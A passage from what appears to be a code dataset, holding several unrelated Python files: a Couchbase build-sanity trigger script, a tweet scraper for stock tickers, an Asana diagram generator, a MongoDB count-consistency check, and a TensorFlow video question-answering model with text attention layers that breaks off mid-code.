self.version = version.split('-')[0]
else:
self.version = version
self.product = product
self.ver_dir = os.path.join("/latestbuilds", product, "zz-versions", self.version)
self.plats = VERSION_DATA[self.version]["platforms"]
self.testrunner_branch = VERSION_DATA[self.version]["testrunner_branch"]
self.bld_num = 0
self.last_bld = 0
def get_last_sanity(self):
"""
Read the global "last-sanity" JSON file and set self.last_bld
for the current version. Return "0" if information cannot be found,
either because the file is missing, the product is missing, or
the version is missing.
"""
# QQQ in future, get/set_last_sanity() functions should be
# replaced with equivalent functions backed by the build database
if not os.path.exists(LAST_SANITY_FILENAME):
self.sanity = {}
else:
with open(LAST_SANITY_FILENAME) as sanity_file:
self.sanity = json.load(sanity_file)
if self.product in self.sanity:
product = self.sanity[self.product]
if self.version in product:
self.last_bld = product[self.version]
return self.last_bld
def set_last_sanity(self, bld_num):
"""
Updates the global last-sanity JSON file with a new build number
for the current product and version. Creates file if necessary.
Expected that get_last_sanity() has been called to initialize
self.sanity.
"""
if not self.product in self.sanity:
self.sanity[self.product] = {}
self.bld_num = bld_num
self.sanity[self.product][self.version] = bld_num
with open(LAST_SANITY_FILENAME, "w") as sanity_file:
json.dump(self.sanity, sanity_file, indent=4,
sort_keys=True, separators=(',', ': '))
def check_build(self, bld_num):
"""
Checks a specific build number for completeness
"""
# QQQ In future this should be replaced with a query to the
# build database
bld_dir = os.path.join(self.ver_dir, str(bld_num))
for plat in self.plats.keys():
if self.plats[plat]:
# QQQ Assumes format of filename unique to couchbase-server
files = glob.glob("{}/couchbase-server-enterprise?{}*{}*".format(
bld_dir, self.version, plat
))
files = [x for x in files if not (x.endswith(".md5") or x.endswith(".sha256"))]
if len(files) == 0:
print ("Platform {} is missing".format(plat))
return False
return True
def get_latest_build(self):
"""
Walk latestbuilds to find the newest complete build that is
newer than self.last_bld. If none are, returns self.last_bld.
"""
# Retrieve last sanity-checked build number (could be 0)
self.get_last_sanity()
# * List all build numbers for this version. Note this may include
# builds for other versions, since all versions for a given
# release share a build directory.
# * Ignore builds above 50000, which are toy builds
builds = [int(x) for x in os.listdir(self.ver_dir)
if x.isdigit() and int(x) > self.last_bld and int(x) < 50000]
builds.sort()
# Check each build after last sanity-checked build
bld_num = self.last_bld
for build in builds:
print ("Checking build " + str(build))
if self.check_build(build):
bld_num = build
print("bld_num is now " + str(bld_num))
return bld_num
def write_properties(self, prop_filename):
"""
Writes out a build-sanity-trigger.properties file with
appropriate trigger information.
"""
# Collect list of all keys in self.plats that have True values,
# but change "windows" to "win64" because build-sanity is annoying.
sanity_plats = [
(x if x != "windows" else "win64")
for x in self.plats.keys() if self.plats[x]
]
with open(prop_filename, "w") as prop:
prop.write("CURRENT_BUILD_NUMBER={}\n".format(self.bld_num))
prop.write("VERSION={}\n".format(self.version))
prop.write("DISTROS={}\n".format(" ".join(sanity_plats)))
prop.write("TESTRUNNER_BRANCH={}\n".format(self.testrunner_branch))
if self.use_magma:
prop.write("EXTRA_TEST_PARAMS={}\n".format("bucket_storage=magma"))
def main():
"""
Parse the command line and execute job
"""
parser = argparse.ArgumentParser(
description = "Find latest successful build for given product/version"
)
parser.add_argument('--product', default="couchbase-server",
help="Product name")
parser.add_argument('--version', required=True, help="Version number")
args = parser.parse_args()
trigger = SanityTrigger(args.product, args.version)
last_bld = trigger.get_last_sanity()
bld_num = trigger.get_latest_build()
if bld_num > last_bld:
print ("Writing " + TRIGGER_PROPERTIES_FILENAME)
trigger.set_last_sanity(bld_num)
trigger.write_properties(TRIGGER_PROPERTIES_FILENAME)
else:
print ("Nothing to do; not writing " + TRIGGER_PROPERTIES_FILENAME)
if (os.path.exists(TRIGGER_PROPERTIES_FILENAME)):
os.unlink(TRIGGER_PROPERTIES_FILENAME)
if __name__ == '__main__':
main()
|
19,266 | 8fd893a1b7076aeaf19b7da3a1366a9f69459d4d | import got3 as got
stocks=['AMZN','GOOGL','AAPL','MSFT','NFLX']
def printTweet(descr, t):
print(descr)
print("Favorite: %s" % t.favorites)
print("Retweets: %d" % t.retweets)
print("Text: %s" % t.text)
print("Date: %s" % t.date)
print("Hashtags: %s\n" % t.hashtags)
def show(query, username, date, maxTweets):
tweetCriteria = got.manager.TweetCriteria()
if query:
tweetCriteria.setQuerySearch(query)
if username:
tweetCriteria.setUsername(username)
if date:
tweetCriteria.setSince(date[0]).setUntil(date[1])
if maxTweets:
tweetCriteria.setMaxTweets(maxTweets)
tweets = got.manager.TweetManager.getTweets(tweetCriteria)
for tweet in tweets:
printTweet("Twitter:", tweet)
# Get tweets by query search
show('$amzn',None,['2017-10-01','2017-10-02'],1000) |
19,267 | 2b8070516685f9631ec00174992941d2f5f70e6e | """
The program start from here
"""
import os
from src.AsanaWrapper import AsanaWrapper
from src.DiagramGenerator import DiagramGenerator
from src.UserStories import UserStories
from src.FileManager import FileManager
from src.dump import dump
def main():
"""
@return:
"""
sprint = AsanaWrapper(os.getenv("ASANA_KEY"))
pld_json = sprint.get_sprint_tasks([os.getenv("TASK")])
gen = DiagramGenerator()
dump(pld_json)
gen.create_xml_tree("Terradia", pld_json)
FileManager().generate_svg_from_xml()
return 0
if __name__ == '__main__':
main()
|
19,268 | 2c020ae6e02d97715d31a74edb4567c06c4fcca1 | import pymongo
client = pymongo.MongoClient(host="192.168.1.106", port=27017)
col_nlp_extract_base_check_person1 = client["earth_gis_temp"]["nlp_extract_base_check_person1"]
col_history_proofreading_base = client["earth_gis_temp"]["history_proofreading_base_copy"]
# id_list = []
# for x in col_history_proofreading_base.find():
# if x["person_id"] not in id_list:
# id_list.append(x["person_id"])
#
# else:
# print("重复 " + x["person_id"])
#
# for x in col_nlp_extract_base_check_person1.find():
# if x["person_id"] not in id_list:
# print(x["person_id"])
col_pro_6_3_id_mapping_before = client["earth_gis_temp"]["pro_6_3_id_mapping_before"]
person_id2count1 = {}
rel_before_list = list(col_pro_6_3_id_mapping_before.find())
for x in rel_before_list:
if x["person_1_id"] not in person_id2count1:
person_id2count1[x["person_1_id"]] = 1
else:
person_id2count1[x["person_1_id"]] += 1
col_history_proofreading_rel = client["earth_gis_temp"]["history_proofreading_rel"]
person_id2count2 = {}
rel_before_list2 = list(col_history_proofreading_rel.find())
for x in rel_before_list2:
if x["person_1_id"] not in person_id2count2:
person_id2count2[x["person_1_id"]] = 1
else:
person_id2count2[x["person_1_id"]] += 1
if len(person_id2count1) != len(person_id2count2):
print("关系库人数,校验前后不一致")
for k, v in person_id2count1.items():
if k in person_id2count2:
if v != person_id2count2[k]:
print("person_1_id:" + k + "校验前后,关系数不一致")
else:
print("person_1_id:" + k + "不在校验后库中") |
19,269 | 2bc68145071a54a8c5fba3a41ee81c0f7bc0537e | import glob
import sys
import os
import tensorflow as tf
import h5py as hf
import numpy as np
sys.path.append("./kinetics-i3d")
import i3d2
import video_rnn
import text_rnn_cudnn
TOWER_NAME = 'tower'
# def build_graph(FLAGS, rgb_input, flow_input, sub, q, ac, a, rgb_seq_len, flow_seq_len,sub_seq_len, q_seq_len):
def build_graph(FLAGS, vocab_embedding, flow_input, sub, q, a0, a1, a2, a3, a4, a, qid, flow_seq_len, sub_seq_len,
q_seq_len, a0_seq_len, a1_seq_len, a2_seq_len, a3_seq_len, a4_seq_len, prob, text_prob, is_training):
# with tf.device("/GPU:0"):
regularizer = tf.contrib.layers.l2_regularizer(scale=FLAGS.wd)
vocab_embedding_tensor = tf.convert_to_tensor(vocab_embedding, dtype=tf.float32)
sub_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, sub)
q_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, q)
a0_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, a0)
a1_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, a1)
a2_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, a2)
a3_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, a3)
a4_tensor = tf.nn.embedding_lookup(vocab_embedding_tensor, a4)
sub_tensor = tf.cast(sub_tensor, tf.float32)
q_tensor = tf.cast(q_tensor, tf.float32)
a0_tensor = tf.cast(a0_tensor, tf.float32)
a1_tensor = tf.cast(a1_tensor, tf.float32)
a2_tensor = tf.cast(a2_tensor, tf.float32)
a3_tensor = tf.cast(a3_tensor, tf.float32)
a4_tensor = tf.cast(a4_tensor, tf.float32)
'''
with tf.variable_scope("RGB"):
rgb_model = i3d.InceptionI3d(FLAGS.num_classes, spatial_squeeze=True, final_endpoint='Logits')
rgb_logits, _ = rgb_model(rgb_input, is_training=is_training[0][0], dropout_keep_prob=prob[0][0])
# rgb_logits = tf.layers.dense(rgb_logits, 300, activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
# name="rgb_fc")
# rgb_logits = tf.nn.dropout(rgb_logits, prob[0][0])
rgb_logits = tf.expand_dims(rgb_logits, 1)
'''
# with tf.device("/GPU:1"):
with tf.variable_scope("Flow"):
flow_model = i3d2.InceptionI3d(FLAGS.num_classes, spatial_squeeze=True, final_endpoint='Logits')
flow_logits, _ = flow_model(flow_input, is_training=is_training[0][0], dropout_keep_prob=prob[0][0])
# flow_logits = tf.layers.dense(flow_logits, 300, activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
# name="flow_fc")
# flow_logits = tf.nn.dropout(flow_logits, prob[0][0])
# flow_logits = tf.expand_dims(flow_logits, 1)
# with tf.device("/GPU:2"):
# with tf.variable_scope("Video_RNN"):
# rgb_rnn_model = video_rnn.vRNN("GRU", FLAGS.num_hidden, 'rgb', FLAGS)
# flow_rnn_model = video_rnn.vRNN("GRU", FLAGS.num_hidden, 'flow', FLAGS)
# rgb_rnn_logits = rgb_rnn_model.build(rgb_logits, is_training=FLAGS.is_training, seq_len=rgb_seq_len)
# flow_rnn_logits = flow_rnn_model.build(flow_logits, is_training=FLAGS.is_training, seq_len=flow_seq_len)
# rgb_rnn_logits = tf.layers.batch_normalization(rgb_rnn_logits)
# flow_rnn_logits = tf.layers.batch_normalization(flow_rnn_logits)
# rgb_rnn_logits = tf.reduce_mean(rgb_rnn_logits, axis=1, keepdims=True)
# flow_rnn_logits = tf.reduce_mean(flow_rnn_logits, axis=1, keepdims=True)
# rgb_rnn_logits = tf.nn.l2_normalize(rgb_rnn_logits, axis=2)
# flow_rnn_logits = tf.nn.l2_normalize(flow_rnn_logits, axis=2)
with tf.variable_scope("Text_LSTM", reuse=tf.AUTO_REUSE):
'''
def apply_softmax(elem):
pass
def apply_attention(elem):
previous = 0
attention_sum_logit = tf.zeros(tf.shape(elem[0]))
attention_sum_logit = tf.map_fn(lambda x: attention_sum_logit + tf.multiply())
for i in elem[1]:
attention_logit = elem[0][previous:i]
attention_logit = tf.multiply(attention_logit, elem[2])
attention_logit = tf.nn.softmax(attention_logit)
attention_logit = tf.reduce_sum(attention_logit, axis=0, keepdims=True)
if not attention_sum_logit:
attention_sum_logit = attention_logit
else:
attention_sum_logit = tf.stack([attention_sum_logit, attention_logit], axis=0)
return attention_sum_logit
'''
text_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden, 'question')
# question_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden, 'question')
# answer_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden, 'answer')
# answer_rnn_model = text_rnn_cudnn.tRNN_answer("GRU", 200, 'answer')
# subtitle_rnn_model = text_rnn_cudnn.tRNN("LSTM", FLAGS.num_hidden, 'subtitle')
question_rnn_logits = text_rnn_model.build(q_tensor, dropout_keep_prob=text_prob, seq_len=q_seq_len)
subtitle_rnn_logits = text_rnn_model.build(sub_tensor, dropout_keep_prob=text_prob, seq_len=sub_seq_len)
answer0_rnn_logits = text_rnn_model.build(a0_tensor, dropout_keep_prob=text_prob, seq_len=a0_seq_len)
answer1_rnn_logits = text_rnn_model.build(a1_tensor, dropout_keep_prob=text_prob, seq_len=a1_seq_len)
answer2_rnn_logits = text_rnn_model.build(a2_tensor, dropout_keep_prob=text_prob, seq_len=a2_seq_len)
answer3_rnn_logits = text_rnn_model.build(a3_tensor, dropout_keep_prob=text_prob, seq_len=a3_seq_len)
answer4_rnn_logits = text_rnn_model.build(a4_tensor, dropout_keep_prob=text_prob, seq_len=a4_seq_len)
with tf.variable_scope("Text_BiDAF_subtitle_question", reuse=tf.AUTO_REUSE):
# subtitle_attention_ex = tf.expand_dims(subtitle_rnn_logits, 2)
# subtitle_attention = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
# tf.shape(subtitle_rnn_logits)[1],
# tf.shape(question_rnn_logits)[1],
# FLAGS.num_hidden * 2])
# question_attention = tf.expand_dims(question_rnn_logits, 1)
# question_attention = tf.broadcast_to(question_attention, [tf.shape(question_rnn_logits)[0],
# tf.shape(subtitle_rnn_logits)[1],
# tf.shape(question_rnn_logits)[1],
# FLAGS.num_hidden * 2])
# subtitle_question_mul = tf.multiply(subtitle_attention, question_attention)
# subtitle_question_concat = tf.concat([subtitle_attention, question_attention, subtitle_question_mul],
# axis=3)
# subtitle_question_similarity = tf.layers.dense(subtitle_question_concat, 1, use_bias=False,
# name='subtitle_question_similarity',
# kernel_regularizer=regularizer)
# subtitle_question_similarity = tf.squeeze(subtitle_question_similarity, axis=[3])
subtitle_question_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(question_rnn_logits, perm=[0, 2, 1]))
subtitle_question_c2q = tf.nn.softmax(subtitle_question_similarity)
subtitle_question_c2q = tf.matmul(subtitle_question_c2q, question_rnn_logits)
# subtitle_question_b = tf.nn.softmax(tf.reduce_max(subtitle_question_similarity, axis=2))
# subtitle_question_b = tf.expand_dims(subtitle_question_b, 1)
# subtitle_question_q2c = tf.matmul(subtitle_question_b, subtitle_rnn_logits)
# subtitle_question_g = tf.concat([subtitle_rnn_logits, subtitle_question_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_question_q2c)], axis=2)
with tf.variable_scope("Text_BiDAF_subtitle_answer", reuse=tf.AUTO_REUSE):
'''
answer0_attention = tf.expand_dims(answer0_rnn_logits, 1)
answer1_attention = tf.expand_dims(answer1_rnn_logits, 1)
answer2_attention = tf.expand_dims(answer2_rnn_logits, 1)
answer3_attention = tf.expand_dims(answer3_rnn_logits, 1)
answer4_attention = tf.expand_dims(answer4_rnn_logits, 1)
answer0_attention = tf.broadcast_to(answer0_attention, [tf.shape(answer0_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer0_rnn_logits)[1],
FLAGS.num_hidden * 2])
answer1_attention = tf.broadcast_to(answer1_attention, [tf.shape(answer1_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer1_rnn_logits)[1],
FLAGS.num_hidden * 2])
answer2_attention = tf.broadcast_to(answer2_attention, [tf.shape(answer2_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer2_rnn_logits)[1],
FLAGS.num_hidden * 2])
answer3_attention = tf.broadcast_to(answer3_attention, [tf.shape(answer3_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer3_rnn_logits)[1],
FLAGS.num_hidden * 2])
answer4_attention = tf.broadcast_to(answer4_attention, [tf.shape(answer4_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer4_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_attention0 = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer0_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_attention1 = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer1_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_attention2 = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer2_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_attention3 = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer3_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_attention4 = tf.broadcast_to(subtitle_attention_ex, [tf.shape(subtitle_rnn_logits)[0],
tf.shape(subtitle_rnn_logits)[1],
tf.shape(answer4_rnn_logits)[1],
FLAGS.num_hidden * 2])
subtitle_answer0_mul = tf.multiply(subtitle_attention0, answer0_attention)
subtitle_answer1_mul = tf.multiply(subtitle_attention1, answer1_attention)
subtitle_answer2_mul = tf.multiply(subtitle_attention2, answer2_attention)
subtitle_answer3_mul = tf.multiply(subtitle_attention3, answer3_attention)
subtitle_answer4_mul = tf.multiply(subtitle_attention4, answer4_attention)
subtitle_answer0_concat = tf.concat([subtitle_attention0, answer0_attention, subtitle_answer0_mul], axis=3)
subtitle_answer1_concat = tf.concat([subtitle_attention1, answer1_attention, subtitle_answer1_mul], axis=3)
subtitle_answer2_concat = tf.concat([subtitle_attention2, answer2_attention, subtitle_answer2_mul], axis=3)
subtitle_answer3_concat = tf.concat([subtitle_attention3, answer3_attention, subtitle_answer3_mul], axis=3)
subtitle_answer4_concat = tf.concat([subtitle_attention4, answer4_attention, subtitle_answer4_mul], axis=3)
subtitle_answer0_similarity = tf.layers.dense(subtitle_answer0_concat, 1, use_bias=False,
name='subtitle_answer_similarity',
kernel_regularizer=regularizer)
subtitle_answer0_similarity = tf.squeeze(subtitle_answer0_similarity, axis=[3])
subtitle_answer1_similarity = tf.layers.dense(subtitle_answer1_concat, 1, use_bias=False,
name='subtitle_answer_similarity', reuse=True,
kernel_regularizer=regularizer)
subtitle_answer1_similarity = tf.squeeze(subtitle_answer1_similarity, axis=[3])
subtitle_answer2_similarity = tf.layers.dense(subtitle_answer2_concat, 1, use_bias=False,
name='subtitle_answer_similarity', reuse=True,
kernel_regularizer=regularizer)
subtitle_answer2_similarity = tf.squeeze(subtitle_answer2_similarity, axis=[3])
subtitle_answer3_similarity = tf.layers.dense(subtitle_answer3_concat, 1, use_bias=False,
name='subtitle_answer_similarity', reuse=True,
kernel_regularizer=regularizer)
subtitle_answer3_similarity = tf.squeeze(subtitle_answer3_similarity, axis=[3])
subtitle_answer4_similarity = tf.layers.dense(subtitle_answer4_concat, 1, use_bias=False,
name='subtitle_answer_similarity', reuse=True,
kernel_regularizer=regularizer)
subtitle_answer4_similarity = tf.squeeze(subtitle_answer4_similarity, axis=[3])
'''
subtitle_answer0_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(answer0_rnn_logits, perm=[0, 2, 1]))
subtitle_answer1_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(answer1_rnn_logits, perm=[0, 2, 1]))
subtitle_answer2_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(answer2_rnn_logits, perm=[0, 2, 1]))
subtitle_answer3_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(answer3_rnn_logits, perm=[0, 2, 1]))
subtitle_answer4_similarity = tf.matmul(subtitle_rnn_logits, tf.transpose(answer4_rnn_logits, perm=[0, 2, 1]))
subtitle_answer0_c2q = tf.nn.softmax(subtitle_answer0_similarity)
subtitle_answer0_c2q = tf.matmul(subtitle_answer0_c2q, answer0_rnn_logits)
subtitle_answer1_c2q = tf.nn.softmax(subtitle_answer1_similarity)
subtitle_answer1_c2q = tf.matmul(subtitle_answer1_c2q, answer1_rnn_logits)
subtitle_answer2_c2q = tf.nn.softmax(subtitle_answer2_similarity)
subtitle_answer2_c2q = tf.matmul(subtitle_answer2_c2q, answer2_rnn_logits)
subtitle_answer3_c2q = tf.nn.softmax(subtitle_answer3_similarity)
subtitle_answer3_c2q = tf.matmul(subtitle_answer3_c2q, answer3_rnn_logits)
subtitle_answer4_c2q = tf.nn.softmax(subtitle_answer4_similarity)
subtitle_answer4_c2q = tf.matmul(subtitle_answer4_c2q, answer4_rnn_logits)
# subtitle_answer0_b = tf.nn.softmax(tf.reduce_max(subtitle_answer0_similarity, axis=2))
# subtitle_answer0_b = tf.expand_dims(subtitle_answer0_b, 1)
# subtitle_answer1_b = tf.nn.softmax(tf.reduce_max(subtitle_answer1_similarity, axis=2))
# subtitle_answer1_b = tf.expand_dims(subtitle_answer1_b, 1)
# subtitle_answer2_b = tf.nn.softmax(tf.reduce_max(subtitle_answer2_similarity, axis=2))
# subtitle_answer2_b = tf.expand_dims(subtitle_answer2_b, 1)
# subtitle_answer3_b = tf.nn.softmax(tf.reduce_max(subtitle_answer3_similarity, axis=2))
# subtitle_answer3_b = tf.expand_dims(subtitle_answer3_b, 1)
# subtitle_answer4_b = tf.nn.softmax(tf.reduce_max(subtitle_answer4_similarity, axis=2))
# subtitle_answer4_b = tf.expand_dims(subtitle_answer4_b, 1)
# subtitle_answer0_q2c = tf.matmul(subtitle_answer0_b, subtitle_rnn_logits)
# subtitle_answer1_q2c = tf.matmul(subtitle_answer1_b, subtitle_rnn_logits)
# subtitle_answer2_q2c = tf.matmul(subtitle_answer2_b, subtitle_rnn_logits)
# subtitle_answer3_q2c = tf.matmul(subtitle_answer3_b, subtitle_rnn_logits)
# subtitle_answer4_q2c = tf.matmul(subtitle_answer4_b, subtitle_rnn_logits)
concat_subtitle_query0 = tf.concat([subtitle_rnn_logits, subtitle_question_c2q, subtitle_answer0_c2q,
tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
tf.multiply(subtitle_rnn_logits, subtitle_answer0_c2q)], axis=2)
concat_subtitle_query1 = tf.concat([subtitle_rnn_logits, subtitle_question_c2q, subtitle_answer1_c2q,
tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
tf.multiply(subtitle_rnn_logits, subtitle_answer1_c2q)], axis=2)
concat_subtitle_query2 = tf.concat([subtitle_rnn_logits, subtitle_question_c2q, subtitle_answer2_c2q,
tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
tf.multiply(subtitle_rnn_logits, subtitle_answer2_c2q)], axis=2)
concat_subtitle_query3 = tf.concat([subtitle_rnn_logits, subtitle_question_c2q, subtitle_answer3_c2q,
tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
tf.multiply(subtitle_rnn_logits, subtitle_answer3_c2q)], axis=2)
concat_subtitle_query4 = tf.concat([subtitle_rnn_logits, subtitle_question_c2q, subtitle_answer4_c2q,
tf.multiply(subtitle_rnn_logits, subtitle_question_c2q),
tf.multiply(subtitle_rnn_logits, subtitle_answer4_c2q)], axis=2)
# subtitle_answer0_g = tf.concat([subtitle_rnn_logits, subtitle_answer0_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_answer0_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_answer0_q2c)], axis=2)
# subtitle_answer1_g = tf.concat([subtitle_rnn_logits, subtitle_answer1_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_answer1_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_answer1_q2c)], axis=2)
# subtitle_answer2_g = tf.concat([subtitle_rnn_logits, subtitle_answer2_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_answer2_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_answer2_q2c)], axis=2)
# subtitle_answer3_g = tf.concat([subtitle_rnn_logits, subtitle_answer3_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_answer3_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_answer3_q2c)], axis=2)
# subtitle_answer4_g = tf.concat([subtitle_rnn_logits, subtitle_answer4_c2q,
# tf.multiply(subtitle_rnn_logits, subtitle_answer4_c2q),
# tf.multiply(subtitle_rnn_logits, subtitle_answer4_q2c)], axis=2)
# with tf.device("/GPU:1"):
'''
with tf.variable_scope("RGB_question_match", reuse=tf.AUTO_REUSE):
question_d = tf.reduce_max(question_rnn_logits, axis=1, keepdims=True)
# question_rgb = tf.layers.dense(question_d, 300, name="RGB_question_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# question_rgb = tf.nn.dropout(question_rgb, prob[0][0])
rgb_question_mul = tf.matmul(tf.transpose(question_d, perm=[0, 2, 1]), rgb_logits)
rgb_question_similarity = tf.nn.softmax(rgb_question_mul)
rgb_question_masked = tf.matmul(rgb_question_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
with tf.variable_scope("RGB_answer_match", reuse=tf.AUTO_REUSE):
answer0_d = tf.reduce_max(answer0_rnn_logits, axis=1, keepdims=True)
answer1_d = tf.reduce_max(answer1_rnn_logits, axis=1, keepdims=True)
answer2_d = tf.reduce_max(answer2_rnn_logits, axis=1, keepdims=True)
answer3_d = tf.reduce_max(answer3_rnn_logits, axis=1, keepdims=True)
answer4_d = tf.reduce_max(answer4_rnn_logits, axis=1, keepdims=True)
# answer0_rgb = tf.layers.dense(answer0_d, 300, name="RGB_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu)
# answer1_rgb = tf.layers.dense(answer1_d, 300, name="RGB_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu, reuse=True)
# answer2_rgb = tf.layers.dense(answer2_d, 300, name="RGB_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu, reuse=True)
# answer3_rgb = tf.layers.dense(answer3_d, 300, name="RGB_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu, reuse=True)
# answer4_rgb = tf.layers.dense(answer4_d, 300, name="RGB_answer_dense", kernel_regularizer=regularizer,
# activation=tf.nn.leaky_relu, reuse=True)
# answer0_rgb = tf.nn.dropout(answer0_rgb, prob[0][0])
# answer1_rgb = tf.nn.dropout(answer1_rgb, prob[0][0])
# answer2_rgb = tf.nn.dropout(answer2_rgb, prob[0][0])
# answer3_rgb = tf.nn.dropout(answer3_rgb, prob[0][0])
# answer4_rgb = tf.nn.dropout(answer4_rgb, prob[0][0])
rgb_answer0_mul = tf.matmul(tf.transpose(answer0_d, perm=[0, 2, 1]), rgb_logits)
rgb_answer1_mul = tf.matmul(tf.transpose(answer1_d, perm=[0, 2, 1]), rgb_logits)
rgb_answer2_mul = tf.matmul(tf.transpose(answer2_d, perm=[0, 2, 1]), rgb_logits)
rgb_answer3_mul = tf.matmul(tf.transpose(answer3_d, perm=[0, 2, 1]), rgb_logits)
rgb_answer4_mul = tf.matmul(tf.transpose(answer4_d, perm=[0, 2, 1]), rgb_logits)
rgb_answer0_similarity = tf.nn.softmax(rgb_answer0_mul)
rgb_answer1_similarity = tf.nn.softmax(rgb_answer1_mul)
rgb_answer2_similarity = tf.nn.softmax(rgb_answer2_mul)
rgb_answer3_similarity = tf.nn.softmax(rgb_answer3_mul)
rgb_answer4_similarity = tf.nn.softmax(rgb_answer4_mul)
rgb_answer0_masked = tf.matmul(rgb_answer0_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
rgb_answer1_masked = tf.matmul(rgb_answer1_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
rgb_answer2_masked = tf.matmul(rgb_answer2_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
rgb_answer3_masked = tf.matmul(rgb_answer3_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
rgb_answer4_masked = tf.matmul(rgb_answer4_similarity, tf.transpose(rgb_logits, perm=[0, 2, 1]))
with tf.variable_scope("RGB_question_answer_att_layer", reuse=tf.AUTO_REUSE):
rgb_question_answer0_att = tf.matmul(rgb_question_masked, tf.transpose(rgb_answer0_masked, perm=[0, 2, 1]))
rgb_question_answer1_att = tf.matmul(rgb_question_masked, tf.transpose(rgb_answer1_masked, perm=[0, 2, 1]))
rgb_question_answer2_att = tf.matmul(rgb_question_masked, tf.transpose(rgb_answer2_masked, perm=[0, 2, 1]))
rgb_question_answer3_att = tf.matmul(rgb_question_masked, tf.transpose(rgb_answer3_masked, perm=[0, 2, 1]))
rgb_question_answer4_att = tf.matmul(rgb_question_masked, tf.transpose(rgb_answer4_masked, perm=[0, 2, 1]))
rgb_question_answer0_cnn = tf.layers.conv1d(rgb_question_answer0_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
kernel_initializer=tf.initializers.random_normal, name="rgb_conv")
rgb_question_answer1_cnn = tf.layers.conv1d(rgb_question_answer1_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="rgb_conv", reuse=True)
rgb_question_answer2_cnn = tf.layers.conv1d(rgb_question_answer2_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="rgb_conv", reuse=True)
rgb_question_answer3_cnn = tf.layers.conv1d(rgb_question_answer3_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="rgb_conv", reuse=True)
rgb_question_answer4_cnn = tf.layers.conv1d(rgb_question_answer4_att, 1, 1, padding='same',
activation=tf.nn.leaky_relu, kernel_regularizer=regularizer,
name="rgb_conv", reuse=True)
rgb_question_answer0_cnn = tf.nn.dropout(rgb_question_answer0_cnn, prob[0][0])
rgb_question_answer1_cnn = tf.nn.dropout(rgb_question_answer1_cnn, prob[0][0])
rgb_question_answer2_cnn = tf.nn.dropout(rgb_question_answer2_cnn, prob[0][0])
rgb_question_answer3_cnn = tf.nn.dropout(rgb_question_answer3_cnn, prob[0][0])
rgb_question_answer4_cnn = tf.nn.dropout(rgb_question_answer4_cnn, prob[0][0])
rgb_question_answer0_cnn = tf.squeeze(rgb_question_answer0_cnn, 2)
rgb_question_answer1_cnn = tf.squeeze(rgb_question_answer1_cnn, 2)
rgb_question_answer2_cnn = tf.squeeze(rgb_question_answer2_cnn, 2)
